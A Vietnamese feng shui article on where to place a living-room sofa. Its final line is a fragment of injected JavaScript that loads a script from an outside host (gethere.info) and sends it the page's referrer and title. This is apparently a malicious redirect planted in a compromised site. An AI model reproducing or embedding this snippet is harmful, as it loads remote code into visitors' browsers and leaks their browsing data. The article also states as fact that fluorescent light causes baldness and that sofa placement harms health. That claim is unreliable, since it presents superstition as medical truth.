Lưu ý về phong thủy nhà ở khi bài trí sofa phòng khách

Sofa và ghế ngồi trong phòng khách không chỉ có hình thức đẹp, chất lượng phải bảo đảm, quan trọng hơn khi bài trí ghế sofa phải phù hợp với phong thủy để có một không gian đẹp và mang lại nhiều may mắn cho gia chủ.

Ghế Sofa là một phần không thể thiếu ở trong phòng khách, kiểu dáng và màu sắc của nó có thể làm cho không gian của nhà ở trở nên hoàn hảo hơn. Sofa vải màu nhã là sự lựa chọn tốt nhất trong phong thuỷ nhà ở, ghế ngồi nên chọn loại có chất lượng gỗ chắc chắn.

bai-tri-ghe-sofa-phong-khach-hop-phong-thuy

Bài trí ghế sofa hợp phong thủy

Ghế ngồi và sofa trong phòng khách có thể được sử dụng để nghỉ ngơi, hoặc để tiếp khách, vì vậy gia chủ phải xem xét cách bố trí sao cho hợp phong thủy ngôi nhà.

Phía sau Sofa phải có chỗ tựa

Sau ghế sofa nên có bức tường chắc chắn, cần chú trọng tới chất liệu làm ghế và các hoa văn trang trí. Chẳng hạn như ghế trong hoàng cung trước đây với lưng tựa làm bằng đá cẩm thạch thiên nhiên, hoa văn thường có cảnh sông núi, không nên kê sofa có hướng phía sau là cửa chính hay lối đi vì như vậy gia chủ sẽ gặp điềm xấu.

Phía trên sofa không được có đèn chiếu thẳng xuống

bai-tri-ghe-sofa-phong-thuy

Trên đầu ghế sofa không được có đèn chiếu xuống

Nếu bạn ngồi làm việc lâu dưới ánh đèn huỳnh quang thì khiến cho đầu sẽ bị hói, đấy là sự tổn thương nhìn thấy bằng mắt thường. Khi đèn ở trên đầu của ghế sofa chiếu thẳng xuống sẽ gây ra sự tổn thương vô hình cho con người, khiến tinh thần của người ngồi trở nên căng thẳng, đứng ngồi không yên, vì thế cần di chuyển ghế sofa ra chỗ khác tốt hơn.

Bố trí Sofa không được đối diện với cửa chính

Trong phong thuỷ cho rằng, nếu gia chủ kê ghế sofa đối diện với cửa chính sẽ khiến cho gia đình li tán, tài khí bị phát tán, ảnh hưởng tới sức khỏe của thành viên gia đình. Trường hợp nếu không thể bố trí ghế sofa ra chỗ khác được thì gia chủ có thể hóa giải bằng cách đặt bình phong ở giữa, bởi thế khí vào nhà từ cửa chính sẽ không lùa thẳng vào ghế sofa.

Xem thêm: http://timnhagiatothn.com/bo-tri-do-dac-lam-sao-de-chuan-phong-thuy-nha-o/

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;